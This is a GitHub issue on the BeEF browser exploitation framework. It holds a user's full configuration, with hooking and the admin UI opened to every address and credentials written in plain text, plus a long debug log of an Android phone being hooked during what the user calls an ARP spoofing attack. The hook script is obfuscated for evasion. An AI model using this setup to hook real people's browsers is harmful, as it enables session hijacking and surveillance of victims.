Did hooking methods change #2906

Closed
ChillVibesMushroom opened this issue Aug 20, 2023 · 6 comments
Labels
Stale Used to mark issues with inactivity

Comments

@ChillVibesMushroom

First Steps

  1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
    I don't see it

  2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
    The wiki was followed as instructed

  3. Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
    I don't see anything that can help me

  4. BeEF Version:
    Browser Exploitation Framework (BeEF) 0.5.4.0

  5. Ruby Version:
    ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]

  6. Browser Details (e.g. Chrome v81.0):
    New Hooked Browser [id:1, ip:192.168.1.5, browser:FF-91, os:Linux-], hooked domain [192.168.1.5:3000]

Android Nokia G400 5G Chrome App Version 101.0.4951.41
Android Version 12

  7. Operating System (e.g. OSX Catalina):
    My Operating system is Linux kali 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64 GNU/Linux

Configuration

# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
# BeEF Configuration file

beef:
    version: '0.5.4.0'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "Concentrate"
        passwd: "Succeed"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that cannot be hooked by the framework
        excluded_hooking_subnet: []
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Public Domain Name / Reverse Proxy / Port Forwarding
        #
        # In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
        # the hook JavaScript needs to be generated with the correct connect-back details.
        #
        # If you're using a public domain name, reverse proxy, or port forwarding you must
        # configure the public-facing connection details here.

        #public:
        #    host: "beef.local" # public hostname/IP address
        #    port: "443" # public port (443 if the public server is using HTTPS)
        #    https: false # true/false

        # If using any reverse proxy you should also set allow_reverse_proxy to true below.
        # Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
        # If the BeEF server is directly accessible, clients can spoof their connecting
        # IP address using this header to bypass the IP address permissions/exclusions.
        allow_reverse_proxy: false

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: true # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    geoip:
        enable: true
        # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
        database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: false
        events:
            enable: true
        evasion:
            enable: true
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        xssrays:
            enable: true

  1. Have you made any changes to your BeEF configuration? Yes/No
    Yes
  2. Have you enabled or disabled any BeEF extensions? Yes/No
    Yes

Steps to Reproduce

  1. (eg. I ran install script, which ran fine)
  2. (eg. when launching console with './beef' I get an error as follows: )
    No Errors
  3. (eg. beef does not launch)
    Beef Launches and hooks the browser but never shows that the browser has been hooked, doesn't display the browser, and this is during an arp spoof attack.

How to enable and capture detailed logging

  1. Edit config.yaml in the root directory
    • If using Kali beef-xss the root dir will be /usr/share/beef-xss
  2. Update client_debug to true
    [23:18:06][>] Using legacy_build_beefjs
    [23:18:06][>] Excluding lib/jquery-1.12.4.min.js from core files obfuscation list
    [23:18:06][>] Excluding lib/json2.js from core files obfuscation list
    [23:18:06][>] Excluding lib/mdetect.js from core files obfuscation list
    [23:18:06][>] [Evasion] Loaded obfuscation chain: minify, base_64
    [23:18:06][>] [Evasion] Adding bootstrapper for technique: base_64
    [23:18:06][>] [Evasion] Applying technique: minify
    [23:18:08][>] [OBFUSCATION - Minifier] JavaScript has been minified
    [23:18:08][>] [Evasion] Applying technique: base_64
    [23:18:08][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
    [23:18:08][>] [Evasion] Obfuscation completed (270990 bytes)
    [23:18:09][>] [INIT] Processing Browser Details...
    [23:18:09][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
    [23:18:10][>] Event: 192.168.1.9 just joined the horde from the domain: 192.168.1.1:80
    [23:18:10][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
    [23:18:10][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
    [23:18:11][>] Event: 192.168.1.9 appears to have come back online
    [23:18:12][>] {"lastseen":"1692573491","count":1,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:12][!] [Browser Details] Invalid browser plugins returned from the hook browser's initial connection.
    [23:18:12][>] [INIT] Processing Browser Details...
    [23:18:12][>] {"lastseen":"1692573492","count":2,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:12][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
    [23:18:12][>] Hooked browser [id:2] has IP [ip: 192.168.1.9]
    [23:18:15][] New Hooked Browser [id:2, ip:192.168.1.9, browser:UNKNOWN-101.0.0.0, os:Android-], hooked domain [192.168.1.1:80]
    [23:18:15][>] Hooked browser has network interface 127.0.0.1
    [23:18:16][>] {"lastseen":"1692573495","count":7,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:17][>] {"lastseen":"1692573496","count":8,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:18][>] {"lastseen":"1692573497","count":9,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:19][>] {"lastseen":"1692573498","count":10,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:20][>] {"lastseen":"1692573499","count":11,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:21][>] {"lastseen":"1692573500","count":12,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:22][>] {"lastseen":"1692573502","count":13,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:23][>] {"lastseen":"1692573503","count":14,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:24][>] {"lastseen":"1692573504","count":15,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:25][>] {"lastseen":"1692573505","count":16,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:26][>] {"lastseen":"1692573506","count":17,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:27][>] {"lastseen":"1692573507","count":18,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:28][>] {"lastseen":"1692573508","count":19,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:29][>] {"lastseen":"1692573509","count":20,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:30][>] {"lastseen":"1692573510","count":21,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:31][>] {"lastseen":"1692573511","count":22,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:32][>] {"lastseen":"1692573512","count":23,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:33][>] {"lastseen":"1692573513","count":24,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:34][>] {"lastseen":"1692573514","count":25,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:35][>] {"lastseen":"1692573515","count":26,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:36][>] {"lastseen":"1692573516","count":27,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:37][>] {"lastseen":"1692573517","count":28,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:38][>] {"lastseen":"1692573518","count":29,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:39][>] {"lastseen":"1692573519","count":30,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
    [23:18:40][>] {"lastseen":"1692573520","count":31,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"
    /","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
